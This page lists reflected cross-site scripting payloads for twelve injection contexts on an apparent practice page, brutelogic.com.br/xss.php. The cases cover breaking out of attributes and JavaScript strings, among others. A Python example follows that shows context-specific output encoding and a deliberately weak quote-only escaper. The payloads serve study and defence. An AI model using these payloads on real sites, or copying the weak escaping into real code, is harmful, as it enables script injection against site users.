Single Reflection

Case 01 - Direct URL Injection (no parameter)

payload:

https://brutelogic.com.br/xss.php/"><script>alert(1)</script>

https://brutelogic.com.br/xss.php/"><svg onload=alert(1)>

Case 02 - Simple HTML Injection (a)

https://brutelogic.com.br/xss.php?a=1"<script>alert(1)</script>

Case 03 - Inline HTML Injection with Double Quotes (b1)

https://brutelogic.com.br/xss.php?b1=1"><script>alert(1)</script>

https://brutelogic.com.br/xss.php?b1=1"><svg onload=alert(1)>

Case 04 - Inline HTML Injection with Single Quotes (b2)

https://brutelogic.com.br/xss.php?b2=1'><script>alert(1)</script>

https://brutelogic.com.br/xss.php?b2=1'><svg onload=alert(1)>

Case 05 - Inline HTML Injection with Double Quotes: No Tag Breaking (b3)

https://brutelogic.com.br/xss.php?b3=1" onmouseover=alert(1)//

Moving the mouse over the injected element triggers the XSS.

Case 06 - Inline HTML Injection with Single Quotes: No Tag Breaking (b4)

https://brutelogic.com.br/xss.php?b4=1' onmouseover=alert(1)//

Case 07 - HTML Injection with Single Quotes in JS Block (c1)

https://brutelogic.com.br/xss.php?c1='</script><svg onload=alert(1)>

Case 08 - HTML Injection with Double Quotes in JS Block (c2)

https://brutelogic.com.br/xss.php?c2="</script><svg onload=alert(1)>//

Case 09 - Simple JS Injection with Single Quotes (c3)

https://brutelogic.com.br/xss.php?c3='-alert(1)-'

Case 10 - Simple JS Injection with Double Quotes (c4)

https://brutelogic.com.br/xss.php?c4="-alert(1)-"

Case 11 - Escaped JS Injection with Single Quotes (c5)

https://brutelogic.com.br/xss.php?c5=\'-alert(1)//

Case 12 - Escaped JS Injection with Double Quotes (c6)

https://brutelogic.com.br/xss.php?c6=\"-confirm(1)//

https://brutelogic.com.br/xss.php?c6=\"-alert(1)//
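The cases above are grouped by where the input is reflected: the HTML body (Case 02), a quoted attribute (Cases 03 to 06), and a JavaScript string literal, either plain or backslash-escaped (Cases 07 to 12). Each context needs its own output encoding, and the one mistake in Cases 11 and 12 is escaping the quote without also handling an attacker-supplied backslash. The following is an added example, written for this page and not code from the original post or from brutelogic.com.br; it implements one encoder per context in Python and runs the page's own payloads through them. `naive_quote_escape` is an assumed model of the quote-only escaping that Cases 11 and 12 defeat, since the server side of xss.php is not shown here.

```python
# Added example (not from the original post or from brutelogic.com.br): one output
# encoder per reflection context, exercised with the payloads listed in the cases above.
import html
import re

# Payloads copied from the test cases above (page content, not constructed here)
HTML_BODY_PAYLOAD = '1"<script>alert(1)</script>'        # Case 02 (a)
ATTR_DQ_PAYLOAD = '1" onmouseover=alert(1)//'             # Case 05 (b3)
ATTR_SQ_PAYLOAD = "1'><svg onload=alert(1)>"              # Case 04 (b2)
JS_SQ_PAYLOAD = "'-alert(1)-'"                            # Case 09 (c3)
JS_ESCAPED_PAYLOAD = "\\'-alert(1)//"                     # Case 11 (c5)
JS_BLOCK_PAYLOAD = "'</script><svg onload=alert(1)>"      # Case 07 (c1)


def encode_html_body(value: str) -> str:
    """HTML text node (Case 02): entity-encode & < > " ' so no tag can open."""
    return html.escape(value, quote=True)


def encode_html_attr(value: str) -> str:
    """Quoted attribute (Cases 03-06): same entities; the template must quote the
    attribute, otherwise a space alone adds a new attribute (Cases 05/06)."""
    return html.escape(value, quote=True)


def _js_escape_char(ch: str) -> str:
    cp = ord(ch)
    if ch.isascii() and ch.isalnum():
        return ch
    if cp > 0xFFFF:  # outside the BMP: emit a UTF-16 surrogate pair
        cp -= 0x10000
        return "\\u{:04x}\\u{:04x}".format(0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF))
    return "\\u{:04x}".format(cp)


def encode_js_string(value: str) -> str:
    """JS string literal (Cases 07-12): \\uXXXX-encode everything except [A-Za-z0-9].
    Quotes, backslashes, '-', '/' and '<' (so '</script>' cannot appear) all become
    escapes the JS parser treats as ordinary string characters."""
    return "".join(_js_escape_char(ch) for ch in value)


def naive_quote_escape(value: str) -> str:
    """Assumed model of the quote-only escaping that Cases 11/12 target (the server
    code is not shown on the page): a backslash before each quote, nothing done
    about a backslash the attacker supplies, so \\' becomes \\\\' and the quote is live."""
    return value.replace("'", "\\'").replace('"', '\\"')


def render_attr_dq(value: str) -> str:
    """Template with a double-quoted attribute, as in Cases 03/05."""
    return '<input type="text" value="{}">'.format(encode_html_attr(value))


def render_js_sq(value: str) -> str:
    """Template with a single-quoted JS string, hardened encoder."""
    return "<script>var v='{}';</script>".format(encode_js_string(value))


def render_js_naive(value: str) -> str:
    """Same template with the quote-only escaping (the weak setting)."""
    return "<script>var v='{}';</script>".format(naive_quote_escape(value))


_JS_SAFE = re.compile(r"(?:[A-Za-z0-9]|\\u[0-9a-f]{4})*")


def js_string_intact(rendered: str) -> bool:
    """True if the literal between var v=' and '; holds only alphanumerics and
    \\uXXXX escapes, i.e. nothing that can end the string or the <script> block."""
    start = rendered.index("var v='") + len("var v='")
    end = rendered.rindex("';</script>")
    return _JS_SAFE.fullmatch(rendered[start:end]) is not None


if __name__ == "__main__":
    for name, out in [
        ("body", encode_html_body(HTML_BODY_PAYLOAD)),
        ("attr", render_attr_dq(ATTR_DQ_PAYLOAD)),
        ("js safe", render_js_sq(JS_ESCAPED_PAYLOAD)),
        ("js naive", render_js_naive(JS_ESCAPED_PAYLOAD)),
    ]:
        print(f"{name:9s} {out}")
```

Running the script shows the quote-only variant leaving `\\'` in the literal (the backslash is consumed by the escape and the quote closes the string), while the `\uXXXX` encoder turns the same input into a string the parser can only read as data. The attribute encoder is only sufficient when the template quotes the attribute; Cases 05 and 06 exist precisely because an unquoted attribute ends at the first space.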
